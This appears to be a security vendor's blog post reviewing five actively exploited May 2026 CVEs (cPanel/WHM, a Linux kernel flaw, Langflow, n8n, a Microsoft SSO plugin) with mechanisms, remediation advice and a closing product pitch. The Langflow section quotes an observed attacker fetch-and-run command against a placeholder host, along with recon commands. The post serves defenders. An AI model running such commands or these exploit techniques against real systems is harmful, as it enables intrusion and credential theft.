For four of the five CVEs that mattered most in May 2026, the patch was already sitting on a vendor page when the attacks started. The bug that did the most damage had a fix out two months before it even got a CVE number. Start there, because it shows the pattern at its worst.
cPanel and WHM run a large slice of the world's shared hosting. The software sits on infrastructure serving roughly 70 million domains, and Rapid7's Shodan data puts about 1.5 million instances directly on the public internet. WHM is the root-level admin layer. Whoever controls it controls every site, database, mailbox, and DNS zone on the host. On shared hosting, that is one login standing between an attacker and thousands of unrelated websites.
CVE-2026-41940 removed that login entirely.
cPanel described the bug in its release notes as “an issue with session loading and saving.” The reality is a carriage-return line-feed injection in the login flow of cpsrvd, the cPanel service daemon. Before authentication finishes, cpsrvd writes a session file to disk. An attacker drops an expected segment from the whostmgrsession cookie, which skips the encryption normally applied to that value, then injects raw \r\n characters through a malicious basic-auth header. The daemon writes those attacker-controlled fields into the session file without sanitizing them. A quirk in how cPanel caches sessions promotes the injected data into a privileged login.
In practice, the attacker reaches a login page on TCP 2083 or 2087, sends a short run of crafted requests, and the next request hands back a forged administrative session. No password. CVSS 9.8.
Here is the part that should bother you. The patch shipped on April 28, 2026, and the CVE was assigned on April 29. Hosting provider KnownHost reported exploitation in the wild going back to roughly February 23. That is a working zero-day live for about two months. watchTowr published a proof-of-concept on April 29, and CISA added it to the Known Exploited Vulnerabilities catalog shortly after.
If a cPanel server ran an unpatched build during that window, patching now is not enough. Treat it as compromised. Update every install for its release tier, restart cpsrvd, rotate credentials, and audit the session directory for forged entries. If you cannot patch immediately, block ports 2083, 2087, 2095, and 2096, or stop cpsrvd and cpdavd.
The same gap shows up in the next four, just at different speeds.
| CVE | Product | CVSS | Type | Exploited | Fix |
|---|---|---|---|---|---|
| CVE-2026-41940 | cPanel & WHM | 9.8 | Pre-auth bypass | ~2 months pre-patch | cPanel 11.136.0.5 + back-ports |
| CVE-2026-31431 | Linux kernel | 7.8 | Local priv-esc | Public PoC, in KEV | Per-distro kernel updates |
| CVE-2026-33017 | Langflow | 9.3 | Unauth RCE | Within 20 hours | Langflow 1.9.0 |
| CVE-2026-21858 | n8n | 10.0 | Unauth file read to RCE | Active scanning, PoC | n8n 1.121.0 |
| CVE-2026-41103 | MS SSO (Jira & Confluence) | 9.1 | Auth bypass | “Exploitation More Likely” | May Patch Tuesday |
Some of these were first disclosed before May. All five drove active exploitation and defender attention through the month.
CVE-2026-31431 scores a 7.8, the lowest number on this list, and it is arguably the most dangerous one to live with undetected.
It hands any unprivileged local user root on nearly every major Linux distribution shipped since 2017. Theori found it, partly with their AI-assisted scanning tool, and a reliable public exploit is already circulating. CISA put it in KEV.
The flaw sits in the kernel's algif_aead module, the AEAD socket interface of the userspace crypto API. Three reasonable changes stacked up to create it over more than a decade, an AEAD wrapper added in 2011, AF_ALG socket support in 2015, and an in-place optimization in 2017. Together, they let an unprivileged user write a few controlled bytes into the kernel's page-cache copy of any readable file, including setuid-root binaries. Corrupt the right structure, and the process escalates to UID 0.
The score stays low because exploitation needs local access. What makes it dangerous is stealth. The change exists only in the page cache, never on disk, so file-integrity checks and disk forensics see a clean file, and a reboot wipes the evidence. An attacker who already has a shell, whether a low-privileged user, a cracked service account, or a container workload, opens an AF_ALG socket, points it at a crypto transform, and rewrites a privileged binary in memory. In containers, the same trick enables escape and lateral movement across a shared host. Catching it requires runtime telemetry, since nothing on disk will ever look wrong.
Patch the kernel for your distro and prioritize Kubernetes nodes and CI/CD runners. Ubuntu 26.04 and later are not affected. If no patched kernel is ready, disable the module by writing install algif_aead /bin/false under /etc/modprobe.d/ and unloading it. That workaround leaves dm-crypt/LUKS, kTLS, IPsec, OpenSSL, GnuTLS, NSS, and SSH working.
CVE-2026-33017 is the clearest argument against waiting for proof-of-concept code before you patch.
Langflow builds AI agents and RAG pipelines, so it sits next to OpenAI, Anthropic, and AWS keys, database strings, and cloud tokens. The advisory went public on March 17. Sysdig observed exploitation within 20 hours, with no public PoC in existence. Attackers built working exploits from the advisory text alone and started harvesting API keys.
The POST /api/v1/build_public_tmp/{flow_id}/flow endpoint is unauthenticated by design, meant to let anyone run a stored public flow. The flaw is an optional data parameter. Supply it, and the endpoint runs attacker-controlled Python from the request instead of the stored flow. That code reaches prepare_global_scope() in validate.py, which calls exec() with no sandbox. One unauthenticated request, code execution as the server process, CVSS 9.3.
Sysdig documented the real kill chain: directory and credential listing with cat /etc/passwd, a fingerprint via id, then a second-stage dropper pulled with bash -c "$(curl -fsSL http://<attacker>/z)" from pre-staged infrastructure. The payoff is the model-provider keys Langflow stores, so one server compromise becomes a breach of every account whose token lives there. This is the second unauthenticated RCE to hit the same unsandboxed exec() path, after CVE-2025-3248 last year.
Upgrade to Langflow 1.9.0, which forces the endpoint to build from stored data only. Until then, block /api/v1/build_public_tmp/ at your proxy, keep Langflow off the public internet, and rotate every key reachable from an exposed instance.
CVE-2026-21858 carries the only perfect 10.0 on this list, and the score deserves a caveat that matters for triage.
n8n has over 100 million Docker pulls and connects into Google Drive, Salesforce, OpenAI, CI/CD, and payment processors. Cyera found the flaw, named it Ni8mare, and counted around 100,000 servers potentially exposed. Shadowserver saw 105,753 unpatched instances at first and still 59,558 by January 11. VulnCheck has since recorded broad scanning and exploit attempts, including Zerobot.
Every inbound webhook and form request runs through parseRequestBody(), which picks a parser from the Content-Type header. The file-handling path runs without confirming the type is multipart/form-data, so an attacker can overwrite the internal req.body.files object. On a server with a custom form that accepts uploads and does not validate content type, this becomes an unauthenticated file read. Read the right files and you pull secrets and forge an admin session token. With admin access, n8n's built-in Execute Command node runs host commands by design, so the chain ends in RCE with no second vulnerability needed.
The 10.0 applies in full only when the instance is reachable and runs a vulnerable upload form. Most n8n deployments sit internally behind a VPN, where Ni8mare works as a post-compromise accelerator that widens the blast radius once an attacker is already on the network. The urgent population is the tens of thousands of self-hosted Docker instances sitting directly on the internet.
Upgrade to n8n 1.121.0, the only real remediation. Keep n8n off the public internet, review custom forms that accept uploads, and watch for requests with mismatched Content-Type headers, unexpected admin session creation, and new workflows calling the Execute Command node.
May was quiet. It was the first Patch Tuesday with no exploited or publicly disclosed zero-day since June 2024. Out of 14 flaws scoring 9.0 or higher, Microsoft flagged exactly one as “Exploitation More Likely,” and that is CVE-2026-41103.
It is an authentication bypass in Microsoft's SAML SSO plugins for Jira and Confluence, two systems holding source code, tickets, and internal docs for a lot of engineering teams. The root cause is an incorrect implementation of an authentication algorithm. As Action1's Mike Walters described it, an unauthenticated attacker sends a crafted SSO response during login and tricks the system into accepting a forged identity, without proper Microsoft Entra ID authentication. The plugin trusts an assertion it should reject and issues a valid session for any account the attacker names. Microsoft classifies it as elevation of privilege. The practical effect is signing in as someone else without their credentials, at CVSS 9.1.
A quiet month invites an orderly rollout, and that is the trap. An SSO bypass converts a single network-reachable flaw into access across everything behind the identity layer. The “Exploitation More Likely” tag is Microsoft's own forward-looking call, so patch this on the normal cycle and resist treating a slow month as room to defer.
Apply the May Patch Tuesday updates for the Jira and Confluence SAML SSO plugins, restrict the SSO endpoints to trusted networks during rollout, and audit auth logs for SAML logins with no matching Entra ID event.
A hosting panel, a kernel, two AI automation tools, and an identity layer. Five products with nothing in common except that the fix was available while the attacks were already running. A CVSS score tells you the ceiling on damage. It says nothing about which flaws are being used right now, which of your assets are exposed, or how far an intruder gets once inside, and those three answers are what decide your patch order.
The Strobes Vulnerability Intelligence platform tracks that live context, exploit availability, real exposure, and priority that shifts as the threat does. Start at strobes.co/vi.
